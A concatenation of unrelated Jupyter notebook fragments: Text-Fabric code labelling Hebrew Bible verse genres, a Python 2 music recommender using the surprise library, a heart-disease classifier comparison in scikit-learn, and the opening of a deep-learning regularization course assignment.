    for verse in verse_node_range(start, end, A.api):
        verse2genre[verse] = genre
        verse2count[verse] += 1
# check for double-labeled verses
for verse,count in verse2count.items():
    if count > 1:
        print(verse, T.sectionFromNode(verse))
# check for missing verses
all_verses = set(F.otype.s('verse'))
for missing_verse in (all_verses - set(verse2genre.keys())):
    print(missing_verse, T.sectionFromNode(missing_verse))
#verse2genre
```
# Export TF Features
```
nodeFeatures = {'genre': verse2genre}
featureMeta = {
    'genre': {
        'description': '(sub)genre of a verse node',
        'authors': 'Dirk Bakker, Marianne Kaajan, Martijn Naaijer, Wido van Peursen, Janet Dyk',
        'origin': 'the genre feature was tagged during the NWO-funded syntactic variation project (2013-2018) of the ETCBC, VU Amsterdam',
        'source_URL': 'https://github.com/MartijnNaaijer/phdthesis/blob/master/Various/subgenres_synvar.xls',
        'valueType': 'str',
    }
}
TF = Fabric('tf/c')
TF.save(nodeFeatures=nodeFeatures, metaData=featureMeta)
```
## Tests
```
TF = Fabric(locations=['~/github/etcbc/bhsa/tf/c', 'tf/c'])
API = TF.load('genre')
API.makeAvailableIn(globals())
F.otype.s('verse')
verse_data = []
for verse_n in F.otype.s('verse'):
    genre = F.genre.v(verse_n)
    book, chapter, verse = T.sectionFromNode(verse_n)
    ref = f'{book} {chapter}:{verse}'
    verse_data.append({
        'node': verse_n,
        'ref': ref,
        'book': book,
        'genre': genre,
        'text': T.text(verse_n),
    })
verse_df = pd.DataFrame(verse_data)
verse_df.set_index('node', inplace=True)
verse_df.head()
# save a .csv copy
verse_df[['ref', 'genre']].to_csv('verse2genre.csv', index=False)
verse_df.genre.value_counts()
verse_df[verse_df.genre == 'prophetic'].book.value_counts()
verse_df[verse_df.genre == 'list'].book.value_counts()
# How many verses per book are a given genre?
book2genre = pd.pivot_table(
verse_df,
index='book',
columns=['genre'],
aggfunc='size',
fill_value=0,
)
book2genre
# get percentages
book2genre.div(book2genre.sum(1), 0)
```
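The row-normalization idiom `book2genre.div(book2genre.sum(1), 0)` divides each row by its row sum, turning counts into per-book genre shares. A toy illustration (the book and genre labels here are made up):

```python
import pandas as pd

# Toy count table standing in for book2genre: rows are books, columns genres.
counts = pd.DataFrame(
    {'poetry': [2, 0], 'prose': [2, 4]},
    index=['BookA', 'BookB'],
)
# div(row_sums, 0) aligns the divisor along the index: one divisor per row.
shares = counts.div(counts.sum(1), 0)
print(shares)  # BookA: 0.5 / 0.5, BookB: 0.0 / 1.0
```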
```
#---------
# Recommender system for NetEase Cloud Music
#
# Modified: 2019-Jan-22
# Platform: Win7 + Python 2
#---------
```
### 1 Extract the desired playlist data from the raw file
```
#coding:utf-8
import json
import sys
# Extract text data in a specific format from the JSON file.
# Output line format: playlist name##tags##playlist ID##subscribed count \t song info
def parse_song_inline(in_line):
    loaded_data = json.loads(in_line)
    name = loaded_data['result']['name'] # playlist name
    tags = ",".join(loaded_data['result']['tags']) # tags
    subscribed_count = loaded_data['result']['subscribedCount'] # subscribed count
    if subscribed_count <= 100:
        #print "subscribed_count is less than 100, please check data ..."
        return False
    playlist_id = loaded_data['result']['id'] # playlist ID
    tracks = loaded_data['result']['tracks'] # "tracks": [{song 1},{song 2}, ...]
    song_inforcontent = ''
    for track in tracks:
        try: # song info contains: song ID:::song name:::artist name:::popularity
            song_inforcontent += "\t" + ":::".join([str(track['id']),track['name'],track['artists'][0]['name'],str(track['popularity'])])
        except Exception,e:
            print "Exception information 1",e
            print track
            continue
    # Build the text line in the following format:
    # playlist name##tags##playlist ID##subscribed count \t song info
    GotText = name+"##"+tags+"##"+str(playlist_id)+'##'+str(subscribed_count)+song_inforcontent
    return GotText
# Write the extracted text to a given text file
def parse_files(input_file,out_file):
    outdata = open(out_file,'w')
    for line in open(input_file):
        GotText = parse_song_inline(line)
        if GotText:
            outdata.write(GotText.encode('utf-8').strip()+"\n")
    outdata.close()
%time parse_files("./RawData/playlistdetail.all.json","./InternalData/1_music_playlist_info.txt")
```
### 2 Convert the playlist data into a format suitable for the recommender system
```
import surprise
import lightfm
# project = offline modeling + online prediction
# Recommendation mechanisms:
# 1. For each user, recommend 7-30 songs per day
# 2. For a song the user listened to, recommend similar songs
# 3. For an artist the user likes, recommend similar artists
#coding:utf-8
# To fit the surprise models, parse the data into "userid itemid rating timestamp" rows
import json
import sys
# check whether the parsed song info is empty
def is_null(s):
    return len(s.split(","))>2
def parse_song_inforcontent(song_inforcontent):
    try:
        song_id,name,artist,popularity = song_inforcontent.split(":::")
        return ",".join([song_id,"1.0",'1300000'])
        #return ",".join([song_id, name, artist, popularity])
    except Exception,e:
        #print "Exception information 2 ",e
        #print song_inforcontent
        return " "
def parse_playlist_inline(in_line):
    try:
        contents = in_line.strip().split("\t") # strip removes leading/trailing characters, whitespace by default
        name,tags,playlist_id,subscribed_count = contents[0].split("##")
        songs_infor = map(lambda x: playlist_id +","+ parse_song_inforcontent(x),contents[1:])
        # filter(function,iterable): keep the elements of iterable for which function returns true
        songs_information = filter(is_null,songs_infor)
        return "\n".join(songs_information)
    except Exception,e:
        #print "Exception information 3 ",e
        return False
# Write the extracted text to a given text file
def parse_files(input_file,out_file):
    outdata = open(out_file,'w')
    for line in open(input_file):
        GotText = parse_playlist_inline(line)
        if GotText:
            outdata.write(GotText.encode('utf-8').strip()+"\n")
    outdata.close()
%time parse_files("./InternalData/1_music_playlist_info.txt","./InternalData/2_music_playlist_surpriseformat.txt")
```
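A minimal sketch of the transformation this cell performs, using a made-up record: each playlist acts as the "user", each song as the "item", with a constant rating and a dummy timestamp, matching the `"user item rating timestamp"` format surprise expects:

```python
# Hypothetical sample line in the intermediate format:
# name##tags##playlist_id##count \t song_id:::song:::artist:::popularity ...
record = "Chill##pop,rock##42##150\t1001:::SongA:::ArtistA:::95\t1002:::SongB:::ArtistB:::80"
header, *songs = record.split("\t")
name, tags, playlist_id, subscribed = header.split("##")
rows = []
for song in songs:
    song_id, song_name, artist, popularity = song.split(":::")
    # playlist is the user, song the item; fixed rating 1.0, dummy timestamp
    rows.append(",".join([playlist_id, song_id, "1.0", "1300000"]))
print(rows)  # ['42,1001,1.0,1300000', '42,1002,1.0,1300000']
```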
### Process the popular playlists
```
%time parse_files("./RawData/popular.playlist","./InternalData/3_music_popularplaylist_surpriseformat.txt")
```
### 3 Save the song and playlist information for later modeling
We need to save the playlist ID => playlist name and song ID => song name mappings for later use.
```
#coding:utf-8
import cPickle as pickle
import sys
def parse_playlist_get_infor(in_line,playlist_dic,song_dic):
    contents = in_line.strip().split("\t")
    name,tags,playlist_id,subscribed_count = contents[0].split("##")
    playlist_dic[playlist_id] = name
    for song in contents[1:]:
        try:
            song_id,song_name,artist,popularity = song.split(":::")
            song_dic[song_id] = song_name + "\t" + artist
        except:
            print "FormatError.."
            print song + "\n"
def parse_file(in_file,out_playlist,out_song):
    playlist_dic = {} # maps playlist ID to playlist name
    song_dic = {} # maps song ID to song name
    for line in open(in_file):
        parse_playlist_get_infor(line,playlist_dic,song_dic)
    # Serialize the dictionaries to binary files with pickle
    pickle.dump(playlist_dic,open(out_playlist,"wb"))
    # reload later via playlist_dic = pickle.load(open("playlist.pkl","rb"))
    pickle.dump(song_dic,open(out_song,"wb"))
%time parse_file("./InternalData/1_music_playlist_info.txt","./InternalData/4_playlist.pkl","./InternalData/5_song.pkl")
%time parse_file("./RawData/popular.playlist","./InternalData/6_popular_playlist.pkl","./InternalData/7_popular_song.pkl")
```
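The pickle save/reload round trip used here can be sketched with a toy dictionary and a temporary file. The sample playlist names are made up, and the sketch uses Python 3's `pickle` where the notebook itself uses Python 2's `cPickle`:

```python
import os
import pickle
import tempfile

# Toy ID -> name mapping standing in for the real playlist dictionary.
playlist_dic = {'42': 'Chill playlist', '7': 'Workout mix'}

# Dump to a temporary .pkl file, then load it back.
path = os.path.join(tempfile.mkdtemp(), 'playlist.pkl')
with open(path, 'wb') as f:
    pickle.dump(playlist_dic, f)
with open(path, 'rb') as f:
    reloaded = pickle.load(f)

print(reloaded == playlist_dic)  # True: the round trip preserves the dict
```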
### 4 Build a collaborative-filtering model and make predictions
#### Using the MovieLens dataset bundled with surprise
```
from surprise import SVD,KNNWithMeans
from surprise import Dataset
from surprise import evaluate,print_perf
# load movielens datasets
data = Dataset.load_builtin('ml-100k')
# k-fold cross-validation
%time data.split(n_folds = 3)
# try an SVD factorization
%time algo = SVD()
print (algo)
# Evaluate the performance of the algorithm on given data
# return A dictionary containing measures as keys and lists as values. Each list contains one entry per fold
%time perf = evaluate(algo,data,measures=[u'rmse', u'mae'] )
%time print_perf(perf)
data.raw_ratings[0]
```
### Hyperparameter tuning
### The algorithm implemented here (SVD, among others) has hyperparameters whose choice affects the final result. Below we use grid search with cross-validation (GridSearch, analogous to sklearn's GridSearchCV) to select the final parameters
```
from surprise import GridSearch
from surprise import SVD # or KNNWithMeans also can be OK!
from surprise import Dataset
# Following parameters use can be understand by help(GridSearch)
algo_class = SVD # KNNWithMeans also can be OK!
param_grid = {'n_epochs':[5,10], 'lr_all':[0.002,0.005], 'reg_all':[0.4,0.6]}
measures = ['rmse', 'mae']
gridsearch = GridSearch(algo_class,param_grid,measures, n_jobs = -1 , verbose = True)
data = Dataset.load_builtin('ml-100k')
data.split(n_folds = 4)
gridsearch.evaluate(data)
```
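Conceptually, `GridSearch` fits and scores the algorithm on every combination of values in `param_grid`. A pure-Python sketch of that expansion (this only illustrates the enumeration, not surprise's internals):

```python
from itertools import product

# Same grid as in the cell above.
param_grid = {'n_epochs': [5, 10], 'lr_all': [0.002, 0.005], 'reg_all': [0.4, 0.6]}

# Enumerate every combination: 2 * 2 * 2 = 8 candidate settings.
keys = sorted(param_grid)
combos = [dict(zip(keys, values))
          for values in product(*(param_grid[k] for k in keys))]

print(len(combos))   # 8
print(combos[0])     # {'lr_all': 0.002, 'n_epochs': 5, 'reg_all': 0.4}
```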
### User 216 rated movie 11 with 5.0 at timestamp 880234346
```
data.raw_ratings[1] # user, item, rating, timestamp
```
### Output the model evaluation
```
gridsearch.best_score
gridsearch.best_score['rmse']
gridsearch.best_estimator
gridsearch.best_params
gridsearch.best_params['mae']
gridsearch.best_params['rmse']
gridsearch.best_score
gridsearch.best_index
gridsearch.cv_results
help(GridSearch)
```
## After building the collaborative-filtering model, find the items most similar to a given item using the algo.get_neighbors function
```
### First take a look at the data being processed
### e.g. in C:\Users\Yazhou\.surprise_data\ml-100k\ml-100k\u.item
import io
import os
file_name = (os.path.expanduser('~') + '/.surprise_data/ml-100k/ml-100k/u.item')
with io.open(file_name,'r',encoding = 'ISO-8859-1') as f:
    for line in f:
        #print ">>>Output: ",line
        pass
```
### 1. Recommendations on the built-in MovieLens dataset
```
from __future__ import (absolute_import,division,print_function,unicode_literals)
import os
import io
from surprise import Dataset
from surprise import KNNBasic # or KNNBaseline
file_name = (os.path.expanduser('~') + '/.surprise_data/ml-100k/ml-100k/u.item')
def read_item_names():
    "Build the mappings from movie ID to movie name and from movie name to movie ID"
    rid_to_name = {}
    name_to_rid = {}
    with io.open(file_name,'r',encoding = 'ISO-8859-1') as f: # "ISO-8859-1" is the encoding of the dataset
        for line in f:
            line = line.split('|') # the raw data is in ID|Name order
            rid_to_name[line[0]] = line[1] # dict: line[0] is the key, line[1] the value
            name_to_rid[line[1]] = line[0] # dict: line[1] is the key, line[0] the value
    return rid_to_name,name_to_rid
# Use the algorithm to compute item-item similarities
data = Dataset.load_builtin('ml-100k')
import random
my_seed = 200
random.seed(my_seed)
trainset = data.build_full_trainset()
# data.split(n_folds = 4,shuffle = True) # Split the dataset into folds for future cross-validation from help(data)
sim_options = {'name':'pearson_baseline','user_based':False,'verbose':True}
# item-based collaborative filtering (user_based = False)
algo = KNNBasic(sim_options = sim_options)
algo.fit(trainset)
# The following example shows that dict entries are looked up by key,
# not by position: 'This is one new movies' is keyed by 3, not stored third.
dict1 = {u'1': u'Toy Story (1995)', u'2': u'GoldenEye (1995)'}
dict1[3] = 'This is one new movies'
dict1
# Compute the pearson_baseline similarity matrix
similarity_matrix = algo.compute_similarities()
# Build the movie ID <-> movie name mappings
rid_to_name,name_to_rid = read_item_names()
# rid_to_name: movie ID -> movie name
rid_to_name
# name_to_rid: movie name -> movie ID
name_to_rid
# Convert the raw movie ID to an inner id, as required by the model
raw_movie_id = name_to_rid['Bye Bye, Love (1995)'] # Toy Story (1995) # Bye Bye, Love (1995)
#raw_movie_id => 1446 raw movie id
inner_movie_id = algo.trainset.to_inner_iid(raw_movie_id)
#inner_movie_id => 1217 inner movie id for use in the model
# Use get_neighbors to find the k nearest/most similar items to inner id iid = 1217
iid = inner_movie_id
k = 12
# get_neighbors returns the inner ids of the closest items; to_raw_iid/to_inner_iid convert item ids
kneighbors_iid = algo.get_neighbors(iid, k) # Returns: the list of the ``k`` (inner) ids of the closest items to ``iid``
# Convert the inner ids back to raw ids
kneighbors_rawid = (algo.trainset.to_raw_iid(k_iid) for k_iid in kneighbors_iid) # returns a generator
# Look up the movie names for the raw ids
movie_withrawid = [rid_to_name[k_rawid] for k_rawid in kneighbors_rawid] # could also be a generator, kept as a list
# Print the movies most similar to the target
for kth in range(0,k):
    print ("The no. %d movie most similar to the target is: %s" %(1 + kth,movie_withrawid[kth]))
```
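The lookup that `get_neighbors` performs can be sketched with a toy item-item similarity matrix (the values below are made up; surprise builds the real matrix with `compute_similarities`):

```python
import numpy as np

# Toy symmetric item-item similarity matrix for 4 items.
sim = np.array([
    [1.0, 0.9, 0.1, 0.4],
    [0.9, 1.0, 0.2, 0.3],
    [0.1, 0.2, 1.0, 0.8],
    [0.4, 0.3, 0.8, 1.0],
])

def top_k_neighbors(sim, iid, k):
    """Return the k items most similar to item `iid`, excluding itself."""
    order = np.argsort(-sim[iid])            # most similar first
    return [j for j in order if j != iid][:k]

print(top_k_neighbors(sim, 0, 2))  # [1, 3]
```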
### 2. Making predictions with the music data
```
from __future__ import (absolute_import, division, print_function,unicode_literals)
import os
import io
from surprise import KNNBaseline,Reader,KNNBasic,KNNWithMeans
from surprise import Dataset
import cPickle as pickle
# Rebuild the mapping from popular-playlist ID to playlist name
playlistid_to_name = {}
playlistid_to_name = pickle.load(open("./InternalData/6_popular_playlist.pkl", 'rb'))
print("Rebuilt the playlist ID -> playlist name mapping ...")
# Rebuild the mapping from playlist name to playlist ID
playlistname_to_id = {}
for playlist_id in playlistid_to_name:
    playlistname_to_id[playlistid_to_name[playlist_id]] = playlist_id
print("Rebuilt the playlist name -> playlist ID mapping ...")
file_path = os.path.expanduser("./InternalData/3_music_popularplaylist_surpriseformat.txt")
# Specify the file format
reader = Reader(line_format = "user item rating timestamp",sep = ',')
# Load the dataset
loaded_musicdata = Dataset.load_from_file(file_path = file_path, reader = reader)
# Build the full trainset used to compute song similarities
music_full_trainset = loaded_musicdata.build_full_trainset()
print("Finished building the dataset ...")
# The playlist ID -> playlist name mapping lives in a dict
#playlistid_to_name.keys()
#playlistid_to_name.values()
print (playlistid_to_name[playlistid_to_name.keys()[2] ])
# Basic statistics of the music trainset
music_full_trainset.n_users
#music_full_trainset.n_items
#music_full_trainset.rating_scale
#music_full_trainset.global_mean
```
### 2.1 Personalized playlist recommendations
```
# Train the model - find similar playlists (assume each user owns exactly one playlist)
algo = KNNBaseline() # user-based KNN by default
algo.train(music_full_trainset)
# Target playlist name
target_playlistname = playlistname_to_id.keys()[39]
print ("Target playlist name:",target_playlistname)
# Target playlist ID
target_playlistid = playlistname_to_id[target_playlistname]
print ("Target playlist raw ID:",target_playlistid)
# Convert the raw playlist ID to an inner id for get_neighbors; to_inner_uid/to_raw_uid convert user ids
target_playlistiid = algo.trainset.to_inner_uid(target_playlistid)
print ("Target playlist inner ID:",target_playlistiid)
k = 10
playlist_neignhbors_kid = algo.get_neighbors(target_playlistiid,k = k)
# Convert the k predicted inner ids back to raw ids
playlist_neignhbors_rid = [algo.trainset.to_raw_uid(innerid) for innerid in playlist_neignhbors_kid]
# Look up the playlist names for the k raw ids
playlist_neignhbors_name = [playlistid_to_name[raw_uid] for raw_uid in playlist_neignhbors_rid]
# Print the k playlist names
print("\nThe k playlists most similar to the target playlist <<",target_playlistname,">> are:" )
for raw_playlistname in playlist_neignhbors_name:
    print (raw_playlistname,"with inner id:",algo.trainset.to_inner_uid(playlistname_to_id[raw_playlistname]))
# Personalized song recommendations
from __future__ import (absolute_import, division, print_function,unicode_literals)
import os
import io
from surprise import KNNBaseline,Reader,KNNBasic,KNNWithMeans
from surprise import Dataset
import cPickle as pickle
# Rebuild the mapping from popular-song ID to song name
songid_to_name = {}
songid_to_name = pickle.load(open("./InternalData/7_popular_song.pkl", 'rb'))
print ("Song ID -> song name mapping ... done!")
# Song name -> song ID mapping
songname_to_id = {}
for song_id in songid_to_name:
    songname_to_id[songid_to_name[song_id]]= song_id # name is the key, id is the value
print("Song name -> song ID mapping ... done!")
file_path = os.path.expanduser("./InternalData/3_music_popularplaylist_surpriseformat.txt")
# Specify the file format
reader = Reader(line_format = "user item rating timestamp",sep = ',')
# Load the dataset
loaded_songdata = Dataset.load_from_file(file_path = file_path, reader = reader)
song_full_trainset = loaded_songdata.build_full_trainset()
# Model
algo = KNNWithMeans()
algo.train(song_full_trainset)
# Target song name
target_songname = songname_to_id.keys()[98]
print("Target song name:",target_songname)
target_songid = songname_to_id[target_songname]
# convert the raw song ID to an inner id (the full song workflow is repeated in section 2.2 below)
target_song_iid = algo.trainset.to_inner_iid(target_songid)
```
### 2.2 Personalized song recommendations
```
from __future__ import (absolute_import, division, print_function,unicode_literals)
import os
import io
from surprise import KNNBaseline,Reader,KNNBasic,KNNWithMeans
from surprise import Dataset
import cPickle as pickle
# Rebuild the mapping from popular-song ID to song name
songid_to_name = {}
songid_to_name = pickle.load(open("./InternalData/7_popular_song.pkl", 'rb'))
print ("Song ID -> song name mapping ... done!")
# Song name -> song ID mapping
songname_to_id = {}
for song_id in songid_to_name:
    songname_to_id[songid_to_name[song_id]]= song_id # name is the key, id is the value
print("Song name -> song ID mapping ... done!")
# User with inner id = 4
user_inner_id = 4
# ur (defaultdict of list): the users' ratings, a dictionary containing
# lists of (item_inner_id, rating) tuples, keyed by user inner id.
item_inner_id_andrating = music_full_trainset.ur[user_inner_id] # returns (item_inner_id, rating) pairs
item_inner_id = map(lambda x:x[0], item_inner_id_andrating)
for item_iid in item_inner_id:
    print (algo.predict(uid = user_inner_id,iid = item_iid,r_ui = None, clip = True,verbose=False),
           songid_to_name[algo.trainset.to_raw_iid(item_iid)])
```
### Predicting with matrix factorization
```
### Using NMF
from surprise import NMF,evaluate
from surprise import Dataset
file_path = os.path.expanduser("./InternalData/3_music_popularplaylist_surpriseformat.txt")
# Specify the file format
reader = Reader(line_format = "user item rating timestamp",sep = ',')
# Load the dataset
loaded_musicdata = Dataset.load_from_file(file_path = file_path, reader = reader)
# Build the trainset used to compute song similarities
trainset = loaded_musicdata.build_full_trainset()
print("Finished building the dataset ...")
# Fit the model
algo= NMF()
algo.train(trainset)
print ("Model fitted ...")
# Pick user inner id = 4
user_inner_id = 4
item_inner_id_andrating = trainset.ur[user_inner_id] # returns (item_inner_id, rating) pairs
item_inner_id = map(lambda x:x[0], item_inner_id_andrating)
# Unlike before, convert the inner ids to raw user and item ids before calling predict
for item_iid in item_inner_id:
    print (algo.predict(uid = algo.trainset.to_raw_uid(user_inner_id),iid = algo.trainset.to_raw_iid(item_iid),r_ui = 1, clip = True,verbose=False),
           songid_to_name[algo.trainset.to_raw_iid(item_iid)])
```
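To see the idea behind NMF itself, here is a tiny NumPy sketch using classic multiplicative updates. This is not surprise's implementation (which fits regularized factors by SGD); it only illustrates that the product `W @ H` of two non-negative factors approximates the rating matrix ever more closely:

```python
import numpy as np

# Random non-negative "rating" matrix and factors (toy sizes, fixed seed).
rng = np.random.RandomState(0)
R = rng.rand(6, 5)
k = 2
W = rng.rand(6, k) + 0.1
H = rng.rand(k, 5) + 0.1

eps = 1e-9
err0 = np.linalg.norm(R - W @ H)
# Lee-Seung multiplicative updates: keep factors non-negative while
# monotonically decreasing the Frobenius reconstruction error.
for _ in range(100):
    H *= (W.T @ R) / (W.T @ W @ H + eps)
    W *= (R @ H.T) / (W @ H @ H.T + eps)
err1 = np.linalg.norm(R - W @ H)

print(err1 < err0)  # True: the reconstruction improves
```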
### The model can be saved and reloaded as follows
```
import surprise
surprise.dump.dump("./InternalData/Recommendation.model",algo = algo) # save to local disk
# Reload the model again
reload_algo = surprise.dump.load("./InternalData/Recommendation.model")
```
### Comparing the performance of different recommendation algorithms
```
# First load the Dataset
from surprise import NMF,evaluate,NormalPredictor,BaselineOnly,KNNBasic,KNNWithMeans,KNNBaseline,SVD
from surprise import Dataset,Reader,SVDpp,SlopeOne,CoClustering
import os,io
file_path = os.path.expanduser("./InternalData/3_music_popularplaylist_surpriseformat.txt")
# Specify the file format
reader = Reader(line_format = "user item rating timestamp",sep = ',')
# Load the dataset
loaded_musicdata = Dataset.load_from_file(file_path = file_path, reader = reader)
loaded_musicdata.split(n_folds = 5)
# read_ratings returns a list of (user, item, rating, timestamp) tuples read from file_name
#loaded_musicdata.read_ratings(file_path)
"Evaluate the performance of the algorithm on given data"
algo = NMF()
perf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse',u'mae'], with_dump=False, dump_dir=None, verbose=1)
print perf
"Evaluate the performance of the algorithm on given data"
algo = NormalPredictor()
perf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse',u'mae'], with_dump=False, dump_dir=None, verbose=1)
print perf
"Evaluate the performance of the algorithm on given data"
algo = BaselineOnly()
perf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse',u'mae'], with_dump=False, dump_dir=None, verbose=1)
print perf
"Evaluate the performance of the algorithm on given data"
algo = KNNBasic()
perf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse',u'mae'], with_dump=False, dump_dir=None, verbose=1)
print perf
"Evaluate the performance of the algorithm on given data"
algo = KNNWithMeans()
perf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse',u'mae'], with_dump=False, dump_dir=None, verbose=1)
print perf
"Evaluate the performance of the algorithm on given data"
algo = SVD()
perf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse',u'mae'], with_dump=False, dump_dir=None, verbose=1)
print perf
"Evaluate the performance of the algorithm on given data"
algo = SVDpp() # SVD++
perf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse','mae'], with_dump=False, dump_dir=None, verbose=1)
print perf
"Evaluate the performance of the algorithm on given data"
algo = CoClustering()
perf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse'], with_dump=False, dump_dir=None, verbose=1)
print (perf)
#help(data)
#help(algo)
#help(KNNBaseline)
#help(KNNWithMeans)
#help(Reader)
#help(Dataset)
#help(music_full_trainset)
#rid_to_name,name_to_rid = read_item_names()
#rid_to_name['344']
#name_to_rid.values()
#name_to_rid.keys()
#name_to_rid["To Cross the Rubicon (1991)"]
```
## 1. Importing the required libraries for EDA
```
import pandas as pd
import numpy as np # For mathematical calculations
import seaborn as sns # For data visualization
import matplotlib.pyplot as plt # For plotting graphs
%matplotlib inline
sns.set(color_codes=True)
import warnings
warnings.filterwarnings("ignore")
# Scaling
from sklearn.preprocessing import RobustScaler
# Train Test Split
from sklearn.model_selection import train_test_split
# Models
from sklearn.svm import SVC
from sklearn.linear_model import LogisticRegression
from sklearn.ensemble import RandomForestClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import GradientBoostingClassifier
# Metrics
from sklearn.metrics import accuracy_score, classification_report
# Cross Validation
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import GridSearchCV
print('Packages imported...')
```
## Reading Data
```
data=pd.read_csv("heart.csv")
data.head()
data.info()
Q1 = data.quantile(0.25).loc['chol']
Q3 = data.quantile(0.75).loc['chol']
IQR = Q3 - Q1
print(IQR,data.shape)
data = data[~((data.chol < (Q1 - 1.5 * IQR)) | (data.chol > (Q3 + 1.5 * IQR)))]
data.shape
```
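The outlier rule applied to `chol` above keeps values within [Q1 - 1.5·IQR, Q3 + 1.5·IQR]. A toy sketch with made-up numbers:

```python
import numpy as np

# Toy sample with one obvious outlier (95).
values = np.array([10, 12, 11, 13, 12, 11, 95])

# Same rule as the cell above: drop points outside 1.5 * IQR of the quartiles.
q1, q3 = np.percentile(values, [25, 75])
iqr = q3 - q1
kept = values[(values >= q1 - 1.5 * iqr) & (values <= q3 + 1.5 * iqr)]

print(kept)  # the outlier 95 is dropped, the other 6 values remain
```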
## Scaling and Encoding features
```
# define the columns to be encoded and scaled
cat_cols = ['sex','exng','caa','cp']
con_cols = ["age","trtbps","chol","thalachh"]
# creating a copy of data
df1 = data[cat_cols + con_cols]
# encoding the categorical columns
X = pd.get_dummies(df1, columns = cat_cols, drop_first = True)
# defining the features and target
y = data[['output']]
# instantiating the scaler
scaler = RobustScaler()
# scaling the continuous features
X[con_cols] = scaler.fit_transform(X[con_cols])
print("The first 5 rows of X are")
X.head()
# Train and test split
X_train, X_test, y_train, y_test = train_test_split(X,y, test_size = 0.2, random_state = 42)
print("The shape of X_train is ", X_train.shape)
print("The shape of X_test is ",X_test.shape)
print("The shape of y_train is ",y_train.shape)
print("The shape of y_test is ",y_test.shape)
```
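`RobustScaler` centers each column on its median and scales by its IQR, which is why it is less sensitive to outliers than standardization by mean and variance. A small check on toy data (the column values are made up):

```python
import numpy as np
from sklearn.preprocessing import RobustScaler

# One toy column with an outlier; RobustScaler should match (x - median) / IQR.
x = np.array([[1.0], [2.0], [3.0], [4.0], [100.0]])
scaled = RobustScaler().fit_transform(x)

median = np.median(x)
q1, q3 = np.percentile(x, [25, 75])
manual = (x - median) / (q3 - q1)

print(np.allclose(scaled, manual))  # True
```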
## Modeling
### 1. Support Vector Machines
```
# instantiating the object and fitting
clf = SVC(kernel='linear', C=1, random_state=42).fit(X_train,y_train)
# predicting the values
y_pred = clf.predict(X_test)
# printing the test accuracy
print("The test accuracy score of SVM is ", accuracy_score(y_test, y_pred))
```
## Hyperparameter tuning of SVC
```
# instantiating the object
svm = SVC()
# setting a grid - not so extensive
parameters = {"C":np.arange(1,10,1),'gamma':[0.00001,0.00005, 0.0001,0.0005,0.001,0.005,0.01,0.05,0.1,0.5,1,5]}
# instantiating the GridSearchCV object
searcher = GridSearchCV(svm, parameters)
# fitting the object
searcher.fit(X_train, y_train)
# the scores
print("The best params are :", searcher.best_params_)
print("The best score is :", searcher.best_score_)
# predicting the values
y_pred = searcher.predict(X_test)
# printing the test accuracy
print("The test accuracy score of SVM after hyper-parameter tuning is ", accuracy_score(y_test, y_pred))
```
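Beyond a single train/test split, the imported (but so far unused) `cross_val_score` can estimate generalization across several folds. A sketch on toy, well-separated data; the two blobs are made up and merely stand in for the heart features:

```python
import numpy as np
from sklearn.model_selection import cross_val_score
from sklearn.svm import SVC

# Two well-separated Gaussian blobs as a stand-in binary dataset.
rng = np.random.RandomState(0)
X_toy = np.vstack([rng.randn(30, 2) + 3, rng.randn(30, 2) - 3])
y_toy = np.array([1] * 30 + [0] * 30)

# 5-fold cross-validated accuracy of the same linear SVC used above.
scores = cross_val_score(SVC(kernel='linear', C=1), X_toy, y_toy, cv=5)
print(scores.mean() > 0.9)  # separable blobs score near 1.0
```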
## Decision Tree
```
# instantiating the object
dt = DecisionTreeClassifier(random_state = 42)
# fitting the model
dt.fit(X_train, y_train)
# calculating the predictions
y_pred = dt.predict(X_test)
# printing the test accuracy
print("The test accuracy score of Decision Tree is ", accuracy_score(y_test, y_pred))
```
## Random Forest
```
# instantiating the object
rf = RandomForestClassifier()
# fitting the model
rf.fit(X_train, y_train)
# calculating the predictions
y_pred = rf.predict(X_test)
# printing the test accuracy
print("The test accuracy score of Random Forest is ", accuracy_score(y_test, y_pred))
```
## Gradient Boosting Classifier
```
# instantiate the classifier
gbt = GradientBoostingClassifier(n_estimators = 300,max_depth=5,subsample=0.8,max_features=0.2,random_state=42)
# fitting the model
gbt.fit(X_train,y_train)
# predicting values
y_pred = gbt.predict(X_test)
print("The test accuracy score of Gradient Boosting Classifier is ", accuracy_score(y_test, y_pred))
```
# Regularization
Welcome to the second assignment of this week. Deep Learning models have so much flexibility and capacity that **overfitting can be a serious problem**, if the training dataset is not big enough. Sure it does well on the training set, but the learned network **doesn't generalize to new examples** that it has never seen!
**You will learn to:** Use regularization in your deep learning models.
Let's first import the packages you are going to use.
### <font color='darkblue'> Updates to Assignment </font>
#### If you were working on a previous version
* The current notebook filename is version "2a".
* You can find your work in the file directory as version "2".
* To see the file directory, click on the Coursera logo at the top left of the notebook.
#### List of Updates
* Clarified explanation of 'keep_prob' in the text description.
* Fixed a comment so that keep_prob and 1-keep_prob add up to 100%
* Updated print statements and 'expected output' for easier visual comparisons.
```
# import packages
import numpy as np
import matplotlib.pyplot as plt
from reg_utils import sigmoid, relu, plot_decision_boundary, initialize_parameters, load_2D_dataset, predict_dec
from reg_utils import compute_cost, predict, forward_propagation, backward_propagation, update_parameters
import sklearn
import sklearn.datasets
import scipy.io
from testCases import *
%matplotlib inline
plt.rcParams['figure.figsize'] = (7.0, 4.0) # set default size of plots
plt.rcParams['image.interpolation'] = 'nearest'
plt.rcParams['image.cmap'] = 'gray'
```
**Problem Statement**: You have just been hired as an AI expert by the French Football Corporation. They would like you to recommend positions where France's goal keeper should kick the ball so that the French team's players can then hit it with their head.
<img src="images/field_kiank.png" style="width:600px;height:350px;">
<caption><center> <u> **Figure 1** </u>: **Football field**<br> The goal keeper kicks the ball in the air, the players of each team are fighting to hit the ball with their head </center></caption>
They give you the following 2D dataset from France's past 10 games.
```
train_X, train_Y, test_X, test_Y = load_2D_dataset()
```
Each dot corresponds to a position on the football field where a football player has hit the ball with his/her head after the French goal keeper has shot the ball from the left side of the football field.
- If the dot is blue, it means the French player managed to hit the ball with his/her head
- If the dot is red, it means the other team's player hit the ball with their head
